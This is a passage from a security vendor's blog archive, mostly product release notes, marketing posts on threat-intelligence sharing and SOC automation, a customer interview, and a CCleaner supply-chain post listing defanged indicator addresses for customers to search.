In your terminal of choice, cd your way to the project folder and run node index.js (or whatever you named your file) and your server should echo “Running on port 8080”.

Now you can POST some chart data to localhost:8080/convert-chart-to-png and get base64 image data in the response!

Obviously this code is not production-ready, but hopefully it can inspire you to do something cool with React and repng - it doesn’t even have to be a chart. You could just as easily pass any react component so why limit yourself?

Wrapping up

We hope to use this technique to bring more of what our customers love about the Perch web app directly to their inbox.

You know what they say: an image is worth a thousand words, but a chart is worth a billion data points - or something like that.

Supercharge your SOC: 3 security playbook ideas with the Perch API

on January 21, 2018

Security automation is all the rage these days, and for good reason. Repetitive, time-consuming tasks are not only a resource drain, but they can cause rather significant security gaps as well. These manual and repetitive tasks are prone to analyst error and carelessness but are also monotonous drudgery that can leave quality talent looking for more interesting jobs.

For most CISOs, turning to security automation and orchestration through the use of playbooks is becoming a step in the right direction. Automation is a powerful strategy to not only eliminate repetitive tasks, but can uncover threats and other issues that no human would have the time to discover manually.

In conversations with our customers, we’re seeing some innovative ideas being discussed. We’re really excited to see our customers leveraging the new Perch API into their automation and orchestration playbooks, due to the depth of community intel we have available. In this article, I wanted to highlight a few ideas to spark your imagination.

Backtesting IoC’s for Deeper Threat Correlation

Security shouldn’t operate in silos any longer. Unfortunately for many organizations, making decisions about threats based upon what others in their threat community are seeing is difficult if not impossible.

However with the power of Perch’s community data, the opportunities are boundless for integration of Perch into a security playbook. Let me illustrate just one single example. Imagine your organization receives an email from an unknown sender. You could build out a playbook that integrates Perch (among other tools!) into a set of actions.

Using the Perch API, a simple query could be made to determine the reputation of the sending IP in the email header. Data can quickly be extracted into metrics such as:

  • Has this IP been reported by other security sharing communities before?
  • How recently has this IP been reported as potentially malicious?
  • Who else has seen this IP? Does it appear to be targeting a specific industry?
  • How many different indicators have been published that contain this IP?

Hopefully by now I have you salivating at the mouth at the potential opportunities afforded by leveraging the Perch API into your playbooks. The results of this deep community data can be used to build out risk scores, response thresholds, and automated actions such as rule blocks and spam tags.

Automate the SOC Workflow

Any CISO worth their salt will tell you they prefer to leverage best of breed security tools as part of an overall security posture. Typically, however, this advantage comes with an agonizing tradeoff. Multiple tools must be individually managed and correlation and integration of data and alerts between tools is a complex challenge.

Perch was created by former security practitioners. We know firsthand that these are challenges Perch should help solve, not contribute to making worse. The Perch API can easily integrate into incident response (IR) systems to enrich its data and fill in gaps with Perch’s threat intelligence. It can help IR be orchestrated from a single unified platform, reducing analyst workload and correlation time.

Indicator Sharing: From Consumer to Producer

At any ISAC or ISAO conference, you’ll hear pleas for organizations of all sizes to begin the process of going from simply consuming threat intel to producing it. We are all in this fight together. When one organization shares intel about a threat they are seeing, countless other organizations may benefit from that intel as well.

While the philosophy is easy to explain, we’ve noticed the most significant challenge to being a producer of threat intel is committing to the time required. This is an element that can easily be automated by the Perch API.

Imagine an end user at your organization visits a compromised website that redirects web traffic to a known malicious host. However, because the website was recently compromised, there is no threat intel about the website itself, but only from the malware redirection. A security playbook could easily be written that uses the Perch API to publish a new indicator to your trusted threat sharing community (ISAC or ISAO) at nearly the same time the attack was detected or blocked. Being able to shut down an attack higher up the kill chain can be an effective way to shift pain back onto the bad guy by disrupting his attack infrastructure and give others an early warning against the threat.


These three ideas are just a few of many new and innovative ideas we’re having in discussions with our customers. To be sure, many more ideas will continue to flow out of these playbooks. What about you? What ideas do you have about leveraging Perch among your other tools and playbooks for security automation and orchestration? I want to hear from you!

Release Notes

January 12, 2018

App-based Two-Factor Authentication: We’ve added mobile app-based (TOTP) TFA to Perch. Additionally, we’ve improved the experience for changing your credentials and moved it all to a new Account Security page. App-based TFA is really, really easy to set up and adds an additional, strong layer of security to your account.
We want to keep the suppression lists focused on the suppressions specific to your group, so we’ve removed global and community suppressions from the dashboard Recent Suppressions panel and have made their display optional (and off by default) on the Alert Suppression management page.
Added ‘workstation’ HTTP/TLS traffic tracking to sensor health. We periodically check recent traffic for domains commonly frequented by workstation users (things like Facebook, LinkedIn, news sites, etc). If we’re not seeing this kind of traffic regularly, it’s an additional sign that your sensor may not be configured to capture all of your traffic or there may be other networking issues preventing you from getting full value from your Perch sensor.
Fixed a missing ’s’ in the firewall dynamic list notes on the Firewall management page
Community dashboard main ‘suppression’ graph data is more accurate. We’ve reworked how that data is shaped and fixed this graph to show the actual, discrete counts.
COMING SOON – MOGA: our internal code name for Search 2.0, this takes any search term and sifts through everything Perch knows for matches. We’ll find indicators, observable, sensor traffic, etc. Each type of data has its own set of metrics and graphs, showing important metrics as they relate to your search term.
IN PROGRESS: additional intel platform integrations.

Release Notes

December 29, 2017

User-created indicator summary emails - you put a lot of work into getting your intel into Perch and we want you to see it getting used! These emails, sent once a week, show any activity that your intel has had.
We’ve released our first open-source code: a command-line interface tool that allows you to bulk-upload indicators from a CSV file. Now you can create intel from home, just like the pros. View it here
File observables should show all hashes instead of just the MD5 hash
Indicator detail ‘details’ should load more quickly
New comments no longer always show the ‘There was an error posting your comment’ notification
  • Comments were posted, but the client was encountering an error merging the new comment into the list for display. No comments were lost.
Minor fixes and tweaks to the public API
Coming soon: improvements to account security
  • Change password and two-factor authentication moving to a dedicated page for easier access
  • Require current password when making any account security changes
  • Support for app-based (e.g. Authy, Google Authenticator) two-factor authentication
  • Increased complexity requirements for new passwords, in addition to our current requirements, passwords will be checked against common password lists, sequences of sequential or repeated characters, and common words.

Visa and Perch Security Partner to bring Visa Threat Intelligence to SMB merchants

on December 12, 2017

Perch has teamed up with Visa in a technology partnership with Perch Security’s Community Defense Platform to expand the reach of Visa Threat Intelligence (VTI) to a broad base of merchants.

Check out the full article here.

Release Notes

December 1, 2017

Group owners & admins: if you leave a community, all open alerts for that community will now be removed. A warning message to this effect has been added to the ‘Leave Community’ confirmation check.
Added scope and reason detail to suppressions display
Dashboard alert panel was trying to load 100 alerts, but only needs to show three - it should load much faster now.
Indicator history tabs - cleaned up display a bit and added missing loading spinners
We’re close to releasing the changes to the public API for Perch alerts and bulk intel creation. We want it to be well documented and usable on release, we’re hoping you’ll think it was worth the wait!
Our work on an internal CSV intel format and loading tool is finished and we’re working with a couple of customers to iterate on it before we release to everyone.

Release Notes

November 20, 2017

Alert History - alerts come in, get triaged, and closed - then you never see them again… until now! We’ve added a new tab on the Alert Review page where you can review all of your closed alerts. You’ll see additional information about the suppression that closed the alert and can jump to the indicator detail page.
Public API improvements: create bulk intel, list alerts, documentation, Python client library. We want people using and sharing our data, we’re listening closely to our users’ requests and are working on providing a simple, clear way to interact with Perch via API.
Minor improvement to Search so that it includes indicators that contain observables that contain the search term, instead of just searching the body of the indicator.
Application tour should now skip admin-only steps for non-admin users.
Clicking the comment delete button should now actually delete the comment.
Indicator history event ordering makes more sense now - we have to load the indicator before we can detect on it.
Alerts by Host - columns scroll independently so that picking an host far down the list doesn’t require you to scroll all the way back to the top to see the alerts for that host.
We’re working on a CSV format and Python tool to bulk load intel into Perch

Release Notes

November 10, 2017

Login History now shows country flag with tooltip next to the IP address - Hey, wait a minute, when did Sally move to China?!?
Added company name to sensor health page - it’s not always easy to remember that ‘angry_carrot’ belongs to Acme Bank & Trust.
(Very Soon) Indicator detail history - shows a timeline of an indicator’s history, when the intel was produced, when it was first sighted in Perch, and when your group has alerted on and suppressed the indicator. Like a social media timeline, but with less propaganda and more threat intel.
Suppressions that would close multiple alerts now remove all of the affected alerts from the UI, instead of just the alert that the suppression was created from (affects Community/Global suppressions)
Improved but not completely fixed indicator detail page ‘produced’ and ‘first/last sightings’ timestamps not having values.
‘Content’ type observables now display a CSV list of content values instead of an empty value
Community Dashboard latest indicators was not showing the last page of the available indicators
Status update emails now show the name of the user that made the status change instead of always showing it was from Perch SOC.
Indicator detail tabs re-ordered - supplies were running low
We’re making adjustments to remove many of the scrolling panels on some of the pages. This should result in a more natural scrolling experience and improved scrolling navigation throughout the app.

Release Notes

October 20, 2017

Group users can change status on events, just like SOC - you can now change the status on an event by using a selector where the status appears
  • Remember: when you’re on the alert review page, alerts are grouped per-tab by status. Changing the status on an alert there will automatically move it to the appropriate tab; it’s not gone, just moved to a different tab.
Email notifications when someone first sights indicators you create!
  • Only sent the first time the intel is sighted.
  • If you’d prefer not to receive these notifications, you can turn them off in your user profile settings.
  • Periodic email reports about intel you’ve created is coming soon.
Indicator detail design pass
  • New graphs
  • Faster loading
  • More coming soon!
Removed SOC logins from team login history - they log in a LOT and it clutters up the view for actual group members
Assorted minor tweaks and fixes
Community Dashboard recent indicators load much faster
Improvements to rule creation monitoring and diagnostics

Release Notes

October 6, 2017

Palo Alto Firewall AddOn - Found a bad actor with Perch? Want to also block it on your firewall? Just check a box while you’re remediating and Perch will send it to the firewall for you.
  • Manage (including manually adding) firewall blocking through Perch admin panels
New - Having trouble getting around Perch town? We’ve launched a new site to bring together all the best tips and tricks for getting the most out of Perch. Have a topic not covered on the site that you’d love to know more about? Let us know.
(Very soon) User login history - Group admins have a menu item to see the login history for the team’s members; users have a new tab on their profile page to see their own login history.
Subnet tags are now displayed on public IPs
Community Dashboard - community files panel now updates correctly when you switch communities; this was purely a visual bug, no files were shared between communities.
Community Dashboard - top analysts panel no longer shows analysts with zero points; if there are no analysts with points, you’ll see a friendly, informative message.
General visual cleanup: aligned some buttons here, tweaked a message there.
Snooze suppressions have been removed. We want to keep Perch simple and easy to use; Snooze suppressions weren’t pulling their weight in the relationship and we decided they needed to go. It’s not you Snooze suppressions, it’s us. We’re sure you’ll find somebody nice.
Port numbers removed from alert Perchybana links: we found that just using the targets and time window gave the best visibility into the traffic relevant to investigating the alert.
Infrastructure upgraded to Python 3.6; other third-party libraries updated to latest and greatest. Keeping Perchy healthy and well preened lets him focus on watching your networks with confidence.

Customer Insights: John Nelson reacts to the HITRUST and American Medical Association Cyber Risk Announcement

on October 6, 2017

In late September, HITRUST and the American Medical Association announced a partnership
to provide education on cyber risk management to healthcare organizations across the US. Their efforts focus on information security risk management, HIPAA compliance and cyber security; with recommendations specifically tailored for small practices, who often lack the resources and personnel that larger organizations have.

Today I spoke with John Nelson, Systems Administrator / Security Officer for U.S. Expediters, Inc. to discuss the ramifications and opportunities of this partnership.
John is the Security Officer for U.S. Expediters, Inc. He is responsible for policy development and operations related to information security and compliance. Following a career in Fire and Emergency Medical Services, he has been involved with information technology in the healthcare sector since 2000.

John, tell us your thoughts on the AMA and HITRUST partnership for security education around cyber risk management.

I am encouraged to see the AMA stepping up and seeking partners to help educate their members about the challenges they face in effectively dealing with a rapidly changing threat landscape. This initiative
seems to fit well within the AMA’s stated mission: “Our mission is to promote the art and science of medicine and the betterment of public health.” The last few decades have seen digital technology bring radical
changes in everything from practice management to the very tools used to diagnose and treat patients. Along with that change, of course, comes new risk. It is well that the AMA is expanding it’s advocate role to
include education about those risks and how to mitigate them.

What do you think this means for small and mid-size healthcare organizations in the US?

Honestly, my fear is that the serious gaps I often see in the security posture of smaller organizations (which include, by the way, most hospitals and medical practices) will remain largely unmitigated. So often,
many excellent solutions, designed and marketed to larger enterprises, are unapproachable for most smaller organizations. They’re either too complex, or too expensive, or both. My hope is that, with educational
pushes like this, the great numbers of these smaller organizations will recognize this gap and create demand for effective and more affordable solutions.

As we all know, smaller healthcare organizations have their hands full with so many priorities. Cybersecurity is just one challenge among many. In your experience, what should security leaders in small and mid-size
healthcare organizations be thinking about to enhance their cybersecurity posture?

In a word - vigilance. I wish I had a dollar for every time I’ve heard it asserted that, “Our anti-virus software is up to date, so we’re good.” For years, passive defenses like that were usually enough, but the modern
threat landscape demands a more proactive approach. We must continually assess that landscape and our security posture within it. We should be actively identifying and mitigating vulnerabilities within our environments.
We should be actively looking for signs of compromise in our environments. The “2017 Cost of Data Breach” report from The Ponemon Institute puts the “mean time to identify” a breach at 191 days. That’s down significantly
from 229 days in the 2016 report, but it still dramatically underscores the need for more, and better… vigilance.

Thanks for your time, John! We really appreciate you talking to us today.

About U.S. Expediters: U.S. Expediters, Inc. is based in the Houston, TX area. It is a group of companies, each of which is involved in the treatment of sleep apnea. Among those entities is, the world’s largest
Internet retailer of CPAP equipment.

About Perch Security: Perch Security offers the first Community Defense Platform. For the first time, even small and midsize businesses can use their sharing community membership (ISACs and ISAOs) to access their relevant
industry-specific threat intelligence and participate within the community – all without purchasing specific tools or increasing staff.

Release Notes

September 29, 2017

Added intel produced or loaded time (depending on which is available) to the alert display
SOC/MSSP CRM: keep track of group contact info inside Perch, available to staff/MSSPs on the suppression modals, so that it’s handy if you need to escalate to the customer
(Very Soon) Palo Alto firewall integration - click a button in Perch to have an IP, url, or domain automatically sent to your firewall.
Better default sorting on admin pages - you mean sorting by database ID isn’t useful to users?!?
Added missing port columns to Perchybana links
Fixed dashboard most recent suppressions not always updating when they should
Fixed page styling to get rid of extra, but pointless scrollbars
Group settings should all be editable now
Sensor health detection count graph Y-Axis labels now show ‘file size’ (x.xGB) numbers, instead of raw byte counts
Indicators now show more observables, up to 1000 (up from 200).
API users no longer appear in the group’s user management list (you can still find your API user info on the group settings pages)
Fixed the group setup page in the signup flow showing the “This field is required” error as soon as the page shows, instead of only when the data needed to be validated
Fixed large, fixed size alert panel on the indicator detail page
Added a check and a useful error message when the user’s browser doesn’t support WebGL

Performance pass, improved caching of frequently used data

Sensor health diagnostic commands and raw health removed for non-staff. No one enjoys seeing how the sausage is made!

Improved tracking and logging for failed logins; tweaks to how failed logins are communicated to staff

Alert row visual tweaking: less vertical space between data, more vertical space between rows.

Improved automatic staff notification when new users and groups join

CCleaner: how to use Perch to confirm you weren't compromised

on September 21, 2017

Cisco’s Talos research team published a blog post Monday covering another supply chain attack involving CCleaner, the well-known and popular system maintenance software.

According to Cisco: For a period of time, the legitimate signed version of CCleaner 5.33 being distributed by Avast also contained a multi-stage malware payload that rode on top of the installation of CCleaner.

Attacks like this against a trusted supply chain between the software manufacturer and the customer are a growing attack vector due to its potential effectiveness and impact.
Security controls like firewalls and endpoint protection are often unable to initially detect supply chain attacks due to trust relationships already in place.

In the wake of supply chain attack, you can benefit from reviewing your network traffic for any indicators of compromise (IOC); and access to network traffic history (like Perchybana) lets you analyze and respond immediately.

Perch customers can quickly search for any indications of compromise using Perchybana, Perch’s new network data search and correlation tool. In Cisco’s report, the following observable was published:

  • 216.126.225[.]148

Additionally, Perch analysts were able to add additional observables from Cisco’s report:

  • 52.213.122[.]236
  • ns2.ab1145b758c30[.]com
  • ns1.apavcul[.]ru
  • ns2.februarystorm[.]net
  • ns1.kdcmwuz[.]ru
  • ns2.gdgctwymm[.]net
  • ns1.lutmkwr[.]ru
  • ns2.hideallip[.]net
  • ns1.uvttrpa[.]ru
  • ns2.soyuzinformaciiimexanikiops[.]com

To review for any network traffic with these observables, Perch users can quickly use these search terms within Perchybana to determine if further incident research and response is warranted:

Perchybana Screenshot

As always, Perch’s Security Operations Center team is monitoring for these IOCs and proactively reached out to any customers who may be impacted.

Release Notes

August 11, 2017

Perchybana per-user saved searches - Decorating her nest with all manner of brightly colored bits of user configuration, now each of our users can have their very own Perchybana configuration - including their own saved searches.
Group selection on suppression review
  • Suppressions load slowly, we know; this is the first step in fixing that
  • More coming soon.
In this month’s edition of Sensor Health magazine:
  • New health details
  • Graph scales that make sense
  • CPU info display
  • And the displayed detection drop percentage precision increased by 100% (Re: now we show two decimal places instead of one.)
New end of signup flair - not so exciting for existing customers, but now every new sign up gets a free puppy! Ok, no free puppy, but there are some digital fireworks. And a sad Perchy if things go wrong.
Enhanced sensor health evaluation
  • No one is happy when sensors aren’t able to do their thing. We’re making our sensor reporting more robust and being more aggressive about what conditions we monitor. Our periodic sensor health reports contain more details and warn about more conditions.
Indicators you’ve created now link to the object detail page so that you can see all of the details about your creation. You’re proud of what you’ve created, you want to see it out there among all the other wild indicators doing its thing. We want those special moments with your indicator to be easier, so now you can jump right to the details page for indicators you’ve created, by clicking on their title from the Sharing ➔ Your Indicators page.
Improved load performance of object detail page, separated sections to load independently - same bat time, same bat channel, same bat data; just served up differently so that the page loads a little better/faster.
Community tags for the communities you’ve shared an indicator with can be clicked to take you to that community’s dash. Community tags should all work the same, but we keep finding the old ones hiding in corners. If you find one that you click on, but it doesn’t take you to the communtiy dashboard, report it!
Global/Community suppressions no longer appear under the ‘Unknown [null]’ group - As part of our No Suppression Left Behind campaign, we’ve ensured that every suppression gets a proper section title, regardless of socioeconomic background, race, creed, or actual group membership. #EqualityForAllSuppressions
Improved internal tools to ensure our customers are having a positive Perchy experience. We’re looking for patterns that warn us that someone’s having a not-so-great experience with Perch, so that we can proactively reach out, figure out what’s not right, and get it fixed ASAP.

Release Notes

July 28, 2017

Dashboard: Now you can see both the active alerts and the things that have been suppressed since you were gone.
Support for international postal codes in sensor setup - Perch learns to be a more equal opportunity guardian of the galaxy; no matter where your sensor is (as long as it’s not the middle of the desert), Perch can put you on the cyber-security map.
Perchybana is live! Impress friends and neighbors with your network traffic insights. Be the life of any party by tracing netflow and diagnosing malware infections.
Alert review pagination, improved alert performance throughout Perch - people like books, books have pages, therefore people like pages. Now Perch has pages on its alert panels, therefore people will like Perch’s alert panels.
Sensor config - edge cases: more resiliency and error correction in uncommon install use cases, more ‘self-healing’ functionality to adjust for common problems.
Alert ‘all targets’ now pulls from the right data source - it used to come from column A, now it comes from column B. Same data, but easier/faster to query.
Show error message if user tries to create a subnet with a name that is too long - focus groups seem to indicate that users do not enjoy functionality that silently fails, so we’ve added a meaningful error message. Who would have known?
Backtest now returns group matches.
We love feedback from our users! If you see something that’s not right, or have an idea to make Perch even more awesomer, report it to

Fishtech Group Announces Strategic Investment and Partnership with Perch Security

on July 19, 2017

Fishtech Group today announced a strategic investment in Perch Security, the information security maverick that combines innovative application design with an in-house security operations center (SOC). This new partnership seeks to expand Perch’s sales and marketing efforts, and to broaden and accelerate product development.”


Release Notes

July 14, 2017

New button next to alert IP addresses to copy to clipboard (without port number)
Improved sensor health network host count
  • Shows last 48 hours only (instead of all time)
  • Updates in real-time (instead of once daily)
Cisco Talos community created – get an oink code here: (third party, not affiliated with Perch)
Suppress by IP: you can now apply a suppression to a single host. Global, community, team, host; so many yummy suppression flavors to choose from.
Replaced Community Dashboard - Trending Indicators data with a top 5 list of indicators in a community with the highest unsuppressed alert counts, over the last 30 days.
General stability improvements to our sensors and improvements to health reporting; keeping Perchy’s eyes and ears clean and in top shape so we can See Farther.
Community feed list ‘Select All’: we think that having to click 100+ checkboxes is lame, too.
Due to the sheer number of individual sightings associated with some alerts, our ‘alert by host’ functionality on the alert review page had to be disabled temporarily so that we could re-architect some of the data that it used.
Fixed: signup process would allow a new user to skip creating a group, which causes all kinds of paperwork issues for sweet, old Fran in the back office. Per Fran’s rules, all new users must now either create a new group or join an existing one before they’re allowed inside Perchy’s exquisite garden.
Secret communities were re-classified SO secret than even Perchy had no idea which was which and started assigning groups to the wrong secret communities. We’ve given Our Great Leader access to the secret community codes and peace is restored to the galaxy, for now.
Fixed: Existing users that received an email invite to another group should now be able to use the invite link to join the group.
Fixed: Buttons that would allow multiple submissions of an action if the button was clicked rapidly (e.g. double-click). Dr. Perchy, PhB(ird), recommends that users limit coffee intake.
Fixes and tweaks to our sensor network and monitoring configurations
Perchy-bana POC is complete, was successful, and we’re building out the QA infrastructure for its initial internal release and testing.
Perch core relational database infrastructure went through another major upgrade with the addition of a read-replica, multi-db configuration, multi-port fuel injector, and twin-turbo blower. VTEC just kicked in, yo!
Hired custodial cron jobs to vacuum and clean up the database nightly. Tried to get the office custodial staff to do it, but they mumbled something about union regulations and overtime.
Nuked certain parts of our BigData infrastructure from orbit and replaced it with something better. Things work like they did before, but they cost less, run smoother, and allow us to scale better in the future.

Release Notes

June 30, 2017

Sensor health enhancements and improved monitoring so Perchy’s caretakers can respond quicker to sensors that are having issues.
  • Detection graph to see traffic level trends
  • Warning/down state for unchanging detection counts
  • Private IPs counts: how many unique IPs in each of the private IP blocks has a sensor seen (You have 1000 hosts on your network, but Perch is only seeing 10 of them)
Perchy gets better at communicating with users: action notification review and cleanup
  • More notifications, for both success and errors
  • Standard success/error look
New suppression scopes:
  • Global: SOC can suppress for all users at once
  • Community: SOC and community admins can suppress an indicator for an entire community
  • (coming soon, work complete, in-review and testing) by-IP: suppress for a single IP
Corrected the Community Dashboard Daily Events indicator counts so that they’re:
  • Storing the indicator counts
  • Computing the count correctly
Sorting by CIDR/subnet now sorts more naturally
Improved handling for observables that are missing intel data
Long comments have had a good talking to and have agreed to stay inside their comment panel better
Several minor bugs and tweaks corrected caused by database migrations & updates
The ’all-natural’ performance enhancing supplements we’ve been feeding Perchy are paying off, his brain is bigger and better than ever!
  • Lots of expensive tech words = faster databases = more responsive Perch = happier users
  • Infrastructure work to ensure that as Perchy’s flock grows (and it is growing!), he can still respond to all of the data as fast as possible!
  • Migration to ElasticSearch 5
Relational DB hardware upgrade and addition of read replica
We’re making strong progress toward Perchy-bana, internal POC and development is promising

Perch partnership program produces practical problem-solving – not panacea – for health care info security challenges

on June 28, 2017

National Health Care Information Sharing and Analysis Community (NH-ISAC) has rolled out an offer for their members that incorporates Perch’s “extremely affordable and simple way to detect and mitigate against threats.”


Release Notes

June 2, 2017

Public Backtest API
  • Manage API token and credentials in Perch
  • Get token, backtest observables, profit!
(Soon) Additional suppression scopes:
  • Global: the Perch SOC will be able to suppress false positives for every group in a single action; we’ll be able to clean up the noisy, false positive intel more quickly so that the gems with real value can shine through.
  • Community: community leaders will be able to groom their own intel from within Perch; a community that preens together, stays together, right?
  • Individual Host: have a single host that you know triggers a FP, but you don’t want to completely ignore the indicator for other hosts? Now you can suppress an event for just one of them.
Sensor Health Summary:
  • Consolidated view of all of your group’s sensors and their health
  • Warnings for low resources and abnormal conditions:
    • Old rules and low rule counts
    • Sensor not uploading data
    • In the Admin menu: Sensor Summary
Emerging Threats (and Pro) selectable feeds
Unmonitored network filtering at the sensor
  • Perch takes the list of unmonitored network subnets for your group and sends it to the sensor so that it knows to ignore those networks in its detections.
  • Results in less work for the sensor, allowing us to do more with the hardware; less data sent to Perch, less outgoing network traffic for you, and less to process and store for us! It’s a genuine win-win paradigm-shifting value add, look at all this synergy! Give Canute and Chris a raise, this is amazing!
Alert filtering now considers subnet names
(Soon) Restart tours: watch them again and again with your friends and family!
Touch ups and polish here and there; retry button added to the end of the signup process when there is an error registering.
User group page no longer shows all of the groups from all of your communities, but only those you are actually a member of.
Perch reaches it’s 1000th build and Perchy has his first birthday!

Perch detected Grizzly indicators (before it was cool)

on January 25, 2017

Just like always, Perch detected indicators for the infamous Grizzly Steppe minutes after DHS released them. Read about how we were able to diffuse any panic or confusion for our users before “the Russians are coming” even hit the news that day.

Check out the full article here.

Other People's Analysts

on January 12, 2017

Over the last 6 years, I have been entrenched in Cyber Security.

Packet capture
Network Forensics
Identity and Access Management
Threat Intelligence
During my nPulse Technologies days (acquired by FireEye), I relearned all the network packet stuff that I had been taught in college. The OSI network layers, VLANs, Q-in-Q… oh boy! Reassembling packets (with python no less) was a REALLY fun exercise… never made it into the product, since there were open source tools that did it better (faster?).. but I did it…. then came the challenge of using the reassembled data in an application.

Imagine this now, you’re a cyber analyst. You’ve got some juicy intel from your ISAC (FS-ISAC? NH-ISAC?) … or maybe it’s from your industry buddies that you share intel with. You set up your alerting mechanisms, you set up your SIEM, and you wait.

PING! You get a hit! You know now have an IP address that a machine in your network tried to go to. You start your research, do a little OSINT, do some googling… find out it’s a shared host. Oh well.

False Positive.

You tell your buddies, and that’s it for the day.

Guess what just happened? Your group just got smarter because two of you did some work. The first guy set up the intel, and you validated it as a false positive. Since you both shared within your community, you just got smarter! You leveraged a few members of the community to make you all better!

This is the best scenario we have today. Some communities share data. Not many communities allow for automatic sharing of sightings (did you see that IOC in the wild?). NO communities allow you to share what you did in regards to that IOC. Did you block it in a Firewall? Did you mark it as a False Positive?

There aren’t many tools out there that can help this process.. The more we can share, the more we can attribute, the more we can automatically know what’s going on in the network of our peers, the safer we’ll all be.

Tackling Expensive and Complicated Information Security

on January 11, 2017

Information Security: It doesn’t have to be so expensive (or complicated!)

The Bad News

For Small/Medium Businesses (SMBs), you can’t approach information security the same way your bigger brothers do. Face it, Capital One has a much larger information security (infosec) budget than the Downtown Credit Union in Powhatan, VA. Small companies don’t have the same staffing models, technology expertise or highly specialized analysts that focus solely on protecting data. Sure, there are free and open source tools, for example, but they still require expertise and time to get them up and running, not to mentioned tuned, maintained, updated, etc!

Here’s another challenge. A good information security practice relies on intelligence about threats, attacks, vulnerabilities, etc. There are open source data sets that can help your SMB know what to look for in network scans, packet matching signatures and queries in your SIEM, but that open source data tends to be stale. Don’t get me wrong, it’s table stakes. You NEED to be on the lookout for what Emerging Threats has, but it’s not sufficient. That data will protect you, but it’s a tiny part of the known bad things out there.

Ok, one more ‘bad news’ comment. There are vendors out there that will sell you cyber threat intelligence (CTI) data. Some aggregate data from intelligence providers; they’re called TIPs, Threat Intelligence Platforms. They provide tools and technologies to help you get known intelligence data. Others research, probe and monitor the internet/private networks looking for ‘things’ that are bad. They’ll either sell you the data or sell it to an aggregation company who will sell it to you. They provide a great service, and deserve to be paid for the work they do, but again, this may be pricey and out of your budget.

The Good News!

There is a new reality out there. There are sharing communities being formed to share this threat intelligence data (ISACs and ISAOs). These groups are focused around specific industries (Health Care, Financial Services, Aviation, etc) and allow a platform to share more RELEVANT data. This is data that affects your industry, and therefore has a much higher chance of being relevant to you company. Their cyber intelligence data is target to their industry and typically much more relevant than the data served from large repositories.

Size doesn’t always matter. With finite resources, both technical and human, it’s nearly impossible for SMBs to look out for all the bad things; and why should they? A bank doesn’t care about a command and control channel for a botnet that is targeting manufacturing equipment.

Sharing communities are becoming the KEY source of threat intelligence data for small to mid-size business. It’s putting the control of the infosec spend back into their hands.

By leveraging shared community data as the primary (but still not only!) source of intelligence, we substantially reduce the cost of a comprehensive cyber intelligence and threat mitigation plan. Once we embrace this new world of industry-specific, relevant cyber intel, we’ll have new ways to connect in a USABLE way. What’s “usable”? In order to reap the benefits of your sharing community memberships, you need readily tools that:

Don’t require a skilled analyst behind the dashboard 24x7.
Don’t require a SIEM to use it.
Doesn’t require a knowledge of code.
Doesn’t require more than a basic understanding of CTI (STIX, TAXII) terminology

Now What

Who’s going to provide a tool like this? Ha! I’m not good at keeping secrets, but I’m working on something that will help bring the promise of a sharing community to reality.

PerchySubscribe to our blog